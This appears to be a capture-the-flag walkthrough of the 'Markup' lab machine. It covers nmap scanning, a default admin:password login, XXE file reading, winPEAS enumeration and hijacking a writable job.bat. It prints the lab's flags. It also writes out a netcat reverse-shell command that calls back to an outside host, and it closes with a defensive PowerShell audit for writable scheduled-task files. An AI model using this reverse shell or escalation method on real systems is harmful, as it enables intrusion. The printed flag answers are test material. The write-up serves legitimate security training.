# Markup

## Initial Scan

```nmap
sudo nmap -T4 -v 10.129.202.209 -oA Markup-Basic
sudo nmap -T4 -p 22,80,443 -sV -sC -v 10.129.202.209 -oA Markup-sv
```

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2F87Vrl9j0sh3J4WyMPjrY%2Fimage.png?alt=media&#x26;token=19077f17-f6ee-47cc-92ec-714560e271eb" alt=""><figcaption></figcaption></figure>

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FzTbLXbTBdyYeP5ayxFjT%2Fimage.png?alt=media&#x26;token=f4cfddfa-4ebf-4d93-9b41-03957b3d4347" alt=""><figcaption></figcaption></figure>

## Task 1

What version of Apache is running on the target's port 80?

Answer: 2.4.41

## Task 2

What username:password combination logs in successfully?

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FC6jdqzXSMlJB0rGhs532%2Fimage.png?alt=media&#x26;token=d19e062a-b219-4f25-ad23-31b812d6ea77" alt=""><figcaption></figcaption></figure>

Just tried basic default logins.

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FcrYNwTal7MEK2xvtHCOn%2Fimage.png?alt=media&#x26;token=2d7e40ff-1c86-4567-82c9-38ba4a3cfb60" alt=""><figcaption></figcaption></figure>

Answer: `admin:password`

## Task 3

What is the word at the top of the page that accepts user input?

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FT5YahMdcJBca0TYYMMuV%2Fimage.png?alt=media&#x26;token=1f0e9778-e6fc-4031-873f-5795de6063a2" alt=""><figcaption></figcaption></figure>

Answer: Order

## Task 4

What XML version is used on the target?

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FBW1BKjRzBuLIeyzfdy2X%2Fimage.png?alt=media&#x26;token=37163232-e438-4a5c-a19a-cc1e3306c94a" alt=""><figcaption></figcaption></figure>

Answer: 1.0

## Task 5

What does the XXE / XEE attack acronym stand for?

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FJvJMjWc8aCRdOa3HsKSF%2Fimage.png?alt=media&#x26;token=f7c7db15-caae-4e10-b5c2-629a099e475e" alt=""><figcaption></figcaption></figure>

Answer: XML external entity

## Task 6

What username can we find on the webpage's HTML code?

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FAnkwxM1PIgPStPmpuT1z%2Fimage.png?alt=media&#x26;token=610ef709-6cb3-4f23-b9d4-f7626e7cb97a" alt=""><figcaption></figcaption></figure>

Answer: Daniel

## Task 7

What is the file located in the Log-Management folder on the target?

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2Ftn8Uh3TjBP7XZecOiTwP%2Fimage.png?alt=media&#x26;token=479878f1-439d-4f11-a479-9c0f2a6b492f" alt=""><figcaption></figcaption></figure>

Save the RSA key to a file on our machine.

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FC14ii17U5hDKA5GF0M5P%2Fimage.png?alt=media&#x26;token=618823de-876c-4ed2-b1fb-ec5662048d11" alt=""><figcaption></figcaption></figure>

Log in as daniel.

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FCWmeo0BpVPHEy7x03NgZ%2Fimage.png?alt=media&#x26;token=fc364ed6-3c45-44f6-83e1-b4179b4aec1e" alt=""><figcaption></figcaption></figure>

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FQMotQWsRCM8NB2RreTrx%2Fimage.png?alt=media&#x26;token=027b81a0-f22f-47e1-89d8-0daa068bfc99" alt=""><figcaption></figcaption></figure>

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FU700JO8RuomYPK094FOt%2Fimage.png?alt=media&#x26;token=4a738122-b2a3-4b8c-9ecb-c86756856835" alt=""><figcaption></figcaption></figure>

Answer: job.bat

## Task 8

What executable is mentioned in the file mentioned before?

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FpiR0MzPk9BPPUYdKWsDB%2Fimage.png?alt=media&#x26;token=a3b66a6e-6187-422c-834f-378848d0273f" alt=""><figcaption></figcaption></figure>

Answer: wevtutil.exe

## Task 9

Submit user flag

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FjVTfcJqCNW5BLt0ZNyjo%2Fimage.png?alt=media&#x26;token=0f25c578-08a8-4097-86a8-6a4b8ad9d851" alt=""><figcaption></figcaption></figure>

Answer: 032d2fc8952a8c24e39c8f0ee9918ef7

## Task 10

Submit root flag

Run winPEAS.

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FuSvrwaCXXnIeWpDGkaOQ%2Fimage.png?alt=media&#x26;token=46900eb5-15bf-430a-9f7c-6853ec2a7a72" alt=""><figcaption></figcaption></figure>

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FnqEohFQClrnae7ce384c%2Fimage.png?alt=media&#x26;token=795fee23-5d03-4c68-b1df-7b5e3f2e9c37" alt=""><figcaption></figcaption></figure>

Under the section "Searching executable files in non-default folders with write (equivalent) permissions (can be slow)" we see:

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2Fpcz3x8oXGIpetUWP95qq%2Fimage.png?alt=media&#x26;token=b880376a-5fb2-45e5-9c69-76dc9282c582" alt=""><figcaption></figcaption></figure>

This is the file we looked at in the previous question. Let's run netcat to connect back to us as admin.

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2F1CULkemHQT4GFe0FHfsY%2Fimage.png?alt=media&#x26;token=05c9e185-aceb-455f-8d67-91c02415bcc1" alt=""><figcaption></figcaption></figure>

Get nc.exe onto the target.

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FsHOwaVvllppqKHLQGrlD%2Fimage.png?alt=media&#x26;token=2e78b337-2f6a-4252-b449-b57cc495ffbd" alt=""><figcaption></figcaption></figure>

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FxuGPDhqvH3nJThcfvJby%2Fimage.png?alt=media&#x26;token=601a2e47-1089-4b57-a211-114abc6c039c" alt=""><figcaption></figcaption></figure>

Run it to get admin on the system:

```
echo C:\Users\Daniel\nc64.exe -e cmd.exe 10.10.14.38 1234 > C:\Log-Management\job.bat
```

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2Fgjwf21Eo7KtNsMXUrc7J%2Fimage.png?alt=media&#x26;token=2d24d31f-72b9-4735-b3f2-39acd2490aa6" alt=""><figcaption></figcaption></figure>

<figure><img src="https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FP3mixbq9acbOkvtyCBEv%2Fimage.png?alt=media&#x26;token=413f13db-1dd6-4bfa-9f48-14c1d29cc9f2" alt=""><figcaption></figcaption></figure>

I had trouble getting the shell to pop, which apparently is common. The root flag is under: `C:\Users\Administrator\Desktop\root.txt`

Answer: f574a3e7650cebd8c39784299cb570f8
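
From the defender's side, the condition winPEAS flagged above (a script in a non-default folder that a standard user can overwrite and that then runs with higher privileges) can be audited directly. The following is an added example, not part of the original walkthrough; it assumes the script is launched by a scheduled task, and the list of low-privileged trustees and the file extensions checked are assumptions to adjust per host.

```powershell
# Added example: list scheduled-task targets that low-privileged users can modify.
# Assumption: these trustees are what counts as "low-privileged" on this host.
$lowPriv = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'

# Any of these rights lets the holder replace the file's contents or rewrite its ACL.
$writeMask = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'

function Get-WritableAce {
    param([string]$Path)
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return }
    $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $lowPriv -contains $_.IdentityReference.Value -and
        (([int]$_.FileSystemRights -band $writeMask) -ne 0)
    }
}

$findings = foreach ($task in Get-ScheduledTask) {
    foreach ($action in $task.Actions) {
        if (-not $action.Execute) { continue }   # COM handler actions have no Execute
        # Candidates: the program itself plus any script path passed as an argument.
        $candidates = @($action.Execute) + @("$($action.Arguments)" -split '\s+')
        foreach ($raw in $candidates) {
            $path = [Environment]::ExpandEnvironmentVariables($raw.Trim('"'))
            if ($path -notmatch '\.(bat|cmd|ps1|vbs|exe)$') { continue }
            if (-not (Test-Path -LiteralPath $path -PathType Leaf)) { continue }
            # A writable parent folder is as bad as a writable file: the file can be swapped.
            foreach ($target in $path, (Split-Path -Parent $path)) {
                foreach ($ace in Get-WritableAce -Path $target) {
                    [pscustomobject]@{
                        Task     = $task.TaskPath + $task.TaskName
                        RunsAs   = $task.Principal.UserId
                        RunLevel = $task.Principal.RunLevel
                        Target   = $target
                        Trustee  = $ace.IdentityReference.Value
                        Rights   = $ace.FileSystemRights
                    }
                }
            }
        }
    }
}

$findings | Sort-Object Task, Target -Unique | Format-Table -AutoSize -Wrap
```

Any row where `RunsAs` is an administrative or SYSTEM account is the same misconfiguration seen with `C:\Log-Management\job.bat`; the fix is to remove write access for non-administrators on the file and its folder.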
